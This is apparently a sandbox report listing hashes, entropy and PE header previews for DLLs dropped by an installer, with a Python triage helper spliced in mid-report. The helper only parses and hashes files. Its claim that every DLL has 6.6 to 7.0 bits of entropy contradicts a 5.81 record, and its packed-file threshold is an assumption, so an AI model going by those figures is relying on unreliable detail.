Encrypted:false
SSDEEP:384:wdv3V0dfpkXc0vVafW2hWqSUA0GftpBjjQjclvQyURz82u6:wdv3VqpkXc0vVaBziRvU22u6
MD5:88C4CA509C947509E123F22E5F077639
SHA1:AE837C556FF23B9E166288A11E409D21BDDDA4ED
SHA-256:0787FD3D9606B8614F9073C5F04CC6CB153BBF2992297CEBB8C537C066A78C9F
SHA-512:3CCE8C4EA63019ADC6383D5DA7F5969B0B10A55CEEF29083E21F04D23377305325C5CB5F4656955F8ABB5A1E10BEEAC60808DE9D03A72462950469AE49768418
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......a.....@.............................V............ ...................<..............8............................................................................text...f........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):19136
Entropy (8bit):7.030340698171656
Encrypted:false
SSDEEP:384:/tZ34W2hWlgbCA0GftpBjx5C32lI663UG:w18i+66kG
MD5:F6B4D8D403D22EB87A60BF6E4A3E7041
SHA1:B51A63F258B57527549D5331C405EACC77969433
SHA-256:25687E95B65D0521F8C737DF301BF90DB8940E1C0758BB6EA5C217CF7D2F2270
SHA-512:1ACD8F7BC5D3AE1DB46824B3A5548B33E56C9BAC81DCD2E7D90FDBD1D3DD76F93CDF4D52A5F316728F92E623F73BC2CCD0BC505A259DFF20C1A5A2EB2F12E41B
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................v............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):19648
Entropy (8bit):6.960490184684636
Encrypted:false
SSDEEP:192:nvj+UKIMFsWVghW/AvSx9YOCAs/nGfe4pBjSf3Ir9WNArXVWQ4mWSEqnajMHxxBB:7+UhW2hWISUA0GftpBjdrZolI663UU
MD5:B9EA058418BE64F85B0FF62341F7099E
SHA1:0B37E86267D0C6782E18F734B710817B8B03DA76
SHA-256:653BE79FA676D052CCE60D743282018FAAAF22E15A3CB8F1EEE01F243D56B431
SHA-512:EFAAC54C0C6648F666B58E0441315446FDBCB8544C3B9E2005482DE25E62E716D0C66DCB7A9CEDD7967FFC26E394AE9F1B1DFDCE1D4243CFDE737140D1C3D51D
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................E............ ...................<..............8............................................................................text...U........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18624
Entropy (8bit):7.0606914357897885
Encrypted:false
SSDEEP:192:B6awWVghW/d7l9YOCAs/nGfe4pBjSf/pjWNArXVWQ4mWgmqnajLQvTP+8jP9Tz8U:WW2hWF7QA0GftpBjQ9YlvQyURz8RG
MD5:A20084F41B3F1C549D6625C790B72268
SHA1:E3669B8D89402A047BFBF9775D18438B0D95437E
SHA-256:0FA42237FD1140FD125C6EDB728D4C70AD0276C72FA96C2FAABF7F429FA7E8F1
SHA-512:DDF294A47DD80B3ABFB3A0D82BC5F2B510D3734439F5A25DA609EDBBD9241ED78045114D011925D61C3D80B1CCD0283471B1DAD4CF16E2194E9BC22E8ABF278F
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18624
Entropy (8bit):6.97908669425612
Encrypted:false
SSDEEP:192:MGMWVghW/AvSx9YOCAs/nGfe4pBjSf6qy4X3WNArXVWQ4mWwiS21qnaj9RlS6VEX:iW2hWoSUA0GftpBjfHWbziS2lBRAkEX
MD5:2886C75F8B9D3EFDF315C44B52847AEE
SHA1:4FC75E39493B356F1F219798E3738DBC764281E4
SHA-256:3DB27D95689F936B4591EBAD18173AD07FAC07D69D68EEFF06DEE158599D731F
SHA-512:2931224106EEEA142664AEC9D1D5D028D15A14765BCE8674D34D67FC027F6FEFF3AF283F3D81B113E6EFCD42E6B4BD249E94E01C8F41B5211650F1775774B765
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......9+....@.............................9............ ...................<..............8............................................................................text...I........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):19648
Entropy (8bit):6.97635016555389
Encrypted:false
SSDEEP:384:UjcW2hWX7QA0GftpBju0dtTxZlBRAk9l3:yAwyi8or1RAO
MD5:3B038338C1EB179D8EEE3883CF42BC3E
SHA1:EA97CF2EE16EF2DF3766A40C6CE33C8BE5F683B2
SHA-256:C17786E9031062F56E4B205F394A795E11EF9367B922763DDF391F2ACAB2E979
SHA-512:1A6D8FC065237BF0DBBA18C777958522697B6BC2BE1B16586870A0C06178D65B521F66F522BF5636DF793E4AC8A2A3DE780B3C7062273A11F52A381EE851ECE6
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......Ts....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22720
                                                                                                                                                                                                  Entropy (8bit):6.8330909328576315
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:sYNpdkKBcyNWVghW/77l9YOCAs/nGfe4pBjSfCKZWNArXVWQ4mWuqnajMHxxBNT5:zuyNW2hWD7QA0GftpBjLKNplI663U4v
                                                                                                                                                                                                  MD5:5245F303E96166B8E625DD0A97E2D66A
                                                                                                                                                                                                  SHA1:1C9ED748763F1FF5B14B8C791A4C29DE753A96AB
                                                                                                                                                                                                  SHA-256:90A63611D9169A8CD7D030CD2B107B6E290E50E2BEBA6FA640A7497A8599AFF5
                                                                                                                                                                                                  SHA-512:AF51F341670F925449E69C4B5F0A82F4FC4EB32913943272C32E3F3F18EE43B4AFB78C0D7D2F965C1ABE6A0F3A368616DD7A4FB74D83D22D1B69B405AEF1E043
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@...........@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):6.969708578931716
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:sWVghW/cgbXH9YOCAs/nGfe4pBjSf4AKWNArXVWQ4mWvMHqnajMHxxBNT0662ONh:sW2hWUgbCA0GftpBjQGEMHlI663Uh
                                                                                                                                                                                                  MD5:45C54A21261180410091CEFB23F6A5AE
                                                                                                                                                                                                  SHA1:80EEE466D086D30C61EAEFC559D57E5E64F56F61
                                                                                                                                                                                                  SHA-256:2B0FEA07DB507B7266346EAB3CA7EDE3821876AADC519DAF059B130B85640918
                                                                                                                                                                                                  SHA-512:4962F85C94162FE2E35979FFF4E4B3752F322C61D801419769916F5E3A0E0C406284D95C22709C690212D4572EB688D9311A8F85F17C4F5D1A5A9F00E732808C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......S....@............................."............ ...................<..............8............................................................................text...2........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20672
                                                                                                                                                                                                  Entropy (8bit):6.979229086130751
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:kgq6nWm5C1W2hW7SUA0GftpBjAdlI663Um:k6nWm5CTqij66km
                                                                                                                                                                                                  MD5:AB8734C2328A46E7E9583BEFEB7085A2
                                                                                                                                                                                                  SHA1:B4686F07D1217C77EB013153E6FF55B34BE0AF65
                                                                                                                                                                                                  SHA-256:921B7CF74744C4336F976DB6750921B2A0960E8AA11268457F5ED27C0E13B2C8
                                                                                                                                                                                                  SHA-512:FD7E828F842DEABF2DCDCEA3E947DC3AA909C0B6A35C75FD64EDC63C359AB97020876E6C59AD335A2A166437FA65F57433F86C1C2FE10A34B90D15D8592FE911
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......X....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19648
                                                                                                                                                                                                  Entropy (8bit):6.948212808065758
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:579Y17aFBRAWVghW/FgbXH9YOCAs/nGfe4pBjSfyWNArXVWQ4mWuA3qnaj9RlS6b:OtW2hWdgbCA0GftpBjrpA3lBRAkJ
                                                                                                                                                                                                  MD5:39D81596A7308E978D67AD6FDCCDD331
                                                                                                                                                                                                  SHA1:A0B2D43DD1C27D8244D11495E16D9F4F889E34C4
                                                                                                                                                                                                  SHA-256:3D109FD01F6684414D8A1D0D2F5E6C5B4E24DE952A0695884744A6CBD44A8EC7
                                                                                                                                                                                                  SHA-512:0EF6578DE4E6BA55EDA64691892D114E154D288C419D05D6CFF0EF4240118C20A4CE7F4174EEC1A33397C6CD0135D13798DC91CC97416351775F9ABF60FCAE76
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......4....@.......................................... ...................<..............8............................................................................text...&........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):7.02455319040347
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wWVghW/4gbXH9YOCAs/nGfe4pBjSfIMYgWNArXVWQ4mWu5BXqnajL1dHx3tKrSwZ:wW2hWwgbCA0GftpBjRMNBtlXBtFwuWd
                                                                                                                                                                                                  MD5:E70D8FE9D21841202B4FD1CF55D37AC5
                                                                                                                                                                                                  SHA1:FA62FB609D15C8AD3B5A12618BCC50F0D95CDEA3
                                                                                                                                                                                                  SHA-256:E087F611B3659151DFB674728202944A7C0FE71710F280840E00A5C4B640632D
                                                                                                                                                                                                  SHA-512:BD38BDF80DEFD4548580E7973D89ED29E1EDD401F202C367A3BA0020678206DA3ACC9B4436C9A122E4EFC32E80DBB39EB9BF08587E4FEBC8F14EC86A8993BCC8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......./....@.............................e............ ...................<..............8............................................................................text...u........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29376
                                                                                                                                                                                                  Entropy (8bit):6.5989266511221745
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:K47isbM4Oe5grykfIgTmLSW2hWPgbCA0GftpBjF17cylBRAkV8:X1Mq5grxfInqH8iBgoRAz
                                                                                                                                                                                                  MD5:D0D380AF839124368A96D6AA82C7C8AE
                                                                                                                                                                                                  SHA1:E2AC42F829085E0E5BEEA29FCFF09E467810A777
                                                                                                                                                                                                  SHA-256:06985D00BF4985024E95442702BBDB53C2127E99F16440424F3380A88883F1A5
                                                                                                                                                                                                  SHA-512:DAF3997922E18C0BE088A15209C9F01CC1DDA90972A6AADCF76DE867B85D34483AD5E138E3FA321C7140BF8E455C2B908D0A4DB6A9E35011786398656B886479
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................@...............................P.......,....@..............................+...........@...............6...<..............8............................................................................text....,.......................... ..`.rsrc........@.......2..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
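The records above all share the same shape: four hash digests, an 8-bit entropy figure, a libmagic-style "File Type" string and a PE header preview, and every one of these installer-dropped DLLs sits at roughly 6.6 to 7.0 bits of entropy with 0% detection. When re-triaging dropped files outside the sandbox it helps to be able to recompute exactly those fields. The following Python helper is an added example, not part of the Joe Sandbox report and not tooling of the analysed sample: it hashes a file, computes byte-level Shannon entropy, walks the DOS header, PE signature, COFF header, optional header and section table to reproduce the "PE32 executable (DLL) (console) Intel 80386" description, and lists section names (the previews above show only `.text` and `.rsrc`). SSDEEP is left out because it needs a third-party library. The `PACKED_ENTROPY_THRESHOLD` value is an assumed triage heuristic, not the rule the sandbox uses for its "Encrypted" field, and `build_sample_pe32_dll()` constructs a synthetic, non-runnable PE image purely as test input.

```python
"""Recompute the dropped-file triage fields (hashes, 8-bit entropy, PE type) with the stdlib."""
import hashlib
import math
import struct
from collections import Counter

# Constants from the PE/COFF specification.
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_DLL = 0x2000
IMAGE_SUBSYSTEM_WINDOWS_GUI = 2
IMAGE_SUBSYSTEM_WINDOWS_CUI = 3
PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B

# Assumed triage heuristic (not Joe Sandbox's rule): whole-file entropy above this
# usually means packed or encrypted content; ordinary compiled DLLs sit around 6.6-7.0.
PACKED_ENTROPY_THRESHOLD = 7.2


def shannon_entropy_8bit(data: bytes) -> float:
    """Byte-level Shannon entropy in bits per byte (0.0 .. 8.0), the 'Entropy (8bit)' figure."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_hashes(data: bytes) -> dict:
    """Upper-case hex digests for the four algorithms the report lists."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                                           # COFF file header is 20 bytes
    magic = struct.unpack_from("<H", data, opt)[0]
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]   # same offset in PE32 and PE32+
    sect_table = opt + opt_size
    sections = []
    for i in range(nsections):
        off = sect_table + i * 40                              # IMAGE_SECTION_HEADER is 40 bytes
        sections.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return {"machine": machine, "magic": magic, "subsystem": subsystem,
            "characteristics": characteristics, "sections": sections}


def describe_pe(pe: dict) -> str:
    """Render a libmagic-style 'File Type' string from the parsed headers."""
    fmt = {PE32_MAGIC: "PE32", PE32PLUS_MAGIC: "PE32+"}.get(pe["magic"], "PE?")
    kind = "DLL" if pe["characteristics"] & IMAGE_FILE_DLL else "EXE"
    subsys = {IMAGE_SUBSYSTEM_WINDOWS_GUI: "GUI", IMAGE_SUBSYSTEM_WINDOWS_CUI: "console"}.get(
        pe["subsystem"], f"subsystem {pe['subsystem']}")
    arch = {IMAGE_FILE_MACHINE_I386: "Intel 80386", IMAGE_FILE_MACHINE_AMD64: "x86-64"}.get(
        pe["machine"], f"machine 0x{pe['machine']:04x}")
    return f"{fmt} executable ({kind}) ({subsys}) {arch}, for MS Windows"


def triage(data: bytes) -> dict:
    """One record in the shape of the dropped-files table, plus the assumed packed-file flag."""
    entropy = shannon_entropy_8bit(data)
    rec = {"Size (bytes)": len(data), "Entropy (8bit)": entropy,
           "Likely packed (assumed threshold)": entropy > PACKED_ENTROPY_THRESHOLD}
    rec.update(file_hashes(data))
    try:
        pe = parse_pe(data)
        rec["File Type"] = describe_pe(pe)
        rec["Sections"] = pe["sections"]
    except (ValueError, struct.error):
        rec["File Type"] = "data"                              # not a parseable PE image
    return rec


def build_sample_pe32_dll() -> bytes:
    """Constructed test input: a minimal, non-runnable PE32 DLL image with .text and .rsrc."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                    # e_lfanew -> PE signature at 0x80
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 2, 0, 0, 0, 0xE0,
                       0x0002 | 0x0100 | IMAGE_FILE_DLL)       # EXECUTABLE_IMAGE|32BIT_MACHINE|DLL
    opt = bytearray(0xE0)                                      # PE32 optional header size
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<H", opt, 68, IMAGE_SUBSYSTEM_WINDOWS_CUI)
    sections = b".text".ljust(8, b"\0") + bytes(32) + b".rsrc".ljust(8, b"\0") + bytes(32)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sections + bytes(0x200)


if __name__ == "__main__":
    for key, value in triage(build_sample_pe32_dll()).items():
        print(f"{key}:{value}")
```

Pointing `triage()` at a real dropped file (`triage(open(path, "rb").read())`) gives values directly comparable to the report fields: matching digests confirm you hold the same artifact the sandbox saw, and a "File Type" or section list that differs from the report is a sign that the file on disk was modified after the sandbox run.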
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):26816
Entropy (8bit):6.632501498817798
Encrypted:false
SSDEEP:384:my+Kr6aLPmIHJI6/CpG3t2G3t4odXLhW2hWjgbCA0GftpBjpCjzTZlXBtFwLd:mZKrZPmIHJI6NT8irCXDyx
MD5:809BC1010EAF714CD095189AF236CE2F
SHA1:10DBC383F7C49DE17FC50E830E3CB494CC873DD1
SHA-256:B52F2B9DE19D12B0E727E13E3DDE93009E487BFB2DD97FD23952C7080949D97E
SHA-512:F72EC10A0005E7023187EF6CCEDF2AF81D16174E628369FB834AF78E4EF2F3D44BF8B70E9B894ABC6791D7B9720C62C52A697FF0ADE0EDDDCAA52B6F14630D1D
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.....$...................@...............................P............@.............................. ...........@...............,...<..............8............................................................................text....".......$.................. ..`.rsrc........@.......(..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):73408
                                                                                                                                                                                                  Entropy (8bit):5.811008103709619
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:nt2b2De5c4bFX2Jy2cvxXWpD9d3334BkZnkPgE79g:nw2De5c4bFX2Jy2cvxXWpD9d3334BkZ3
                                                                                                                                                                                                  MD5:1DD5666125B8734E92B1041139FA6C37
                                                                                                                                                                                                  SHA1:22E9566352E77AB15A917B45A86C0DC548431692
                                                                                                                                                                                                  SHA-256:D0FF5F6BB94961D4C17F0709297A6B5A5FA323C9AC82F4FE27187912B4B13CF3
                                                                                                                                                                                                  SHA-512:420B9184842ECD7969BF75F0D8A62569725624AE413C83EE3B6F26973318B4170287F657F2BE8DD3E7FC71264D69B2203E016D078615AD6E31E65033D5C59654
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................................................................@.............................8................................<..............8............................................................................text...H........................... ..`.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19648
                                                                                                                                                                                                  Entropy (8bit):6.961849079425489
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:pYTRQqjd7NWVghW/RmgbXH9YOCAs/nGfe4pBjSf1wjWNArXVWQ4mW4C0zA7qnajP:2KcW2hW5mgbCA0GftpBjLKlvQyURz8x
                                                                                                                                                                                                  MD5:8F8A47617DFD829A63E3EC4AFF2718D9
                                                                                                                                                                                                  SHA1:1D7DC26BB9C78C4499514FB3529B3478AECF7340
                                                                                                                                                                                                  SHA-256:6D4A1AAD695A3451C2D3F564C7CC8D37192CD35539874DF6AE55E24847E51784
                                                                                                                                                                                                  SHA-512:D3B96B1F80C20DE58A4D4179177E1C1C2B460719968FBA42E1BA694D890342AAAB5A8C67E7FFDD126B2FC6D6A7B2408952279D8926B14BF2DF11740483867821
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......\r....@.............................x............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23232
                                                                                                                                                                                                  Entropy (8bit):6.854338104703726
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:5b7hrKIW2hW6SUA0GftpBjoQt1TlI663UMp:5bNrKcziZzW66kMp
                                                                                                                                                                                                  MD5:AE3FA6BF777B0429B825FB6B028F8A48
                                                                                                                                                                                                  SHA1:B53DBFDB7C8DEAA9A05381F5AC2E596830039838
                                                                                                                                                                                                  SHA-256:66B86ED0867FE22E80B9B737F3EE428BE71F5E98D36F774ABBF92E3AACA71BFB
                                                                                                                                                                                                  SHA-512:1339E7CE01916573E7FDD71E331EEEE5E27B1DDD968CADFA6CBC73D58070B9C9F8D9515384AF004E5E015BD743C7A629EB0C62A6C0FA420D75B069096C5D1ECE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@......@.....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24768
                                                                                                                                                                                                  Entropy (8bit):6.784463110154403
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:vUFVhjW2hWcgbCA0GftpBjH95mnlvQyURz8te:szC8iEvU2Y
                                                                                                                                                                                                  MD5:32D7B95B1BCE23DB9FBD0578053BA87F
                                                                                                                                                                                                  SHA1:7E14A34AC667A087F66D576C65CD6FE6C1DFDD34
                                                                                                                                                                                                  SHA-256:104A76B41CBD9A945DBA43A6FFA8C6DE99DB2105D4CE93A717729A9BD020F728
                                                                                                                                                                                                  SHA-512:7DAD74A0E3820A8237BAB48F4962FE43E5B60B00F003A5DE563B4CF61EE206353C9689A639566DC009F41585B54B915FF04F014230F0F38416020E08C8A44CB4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
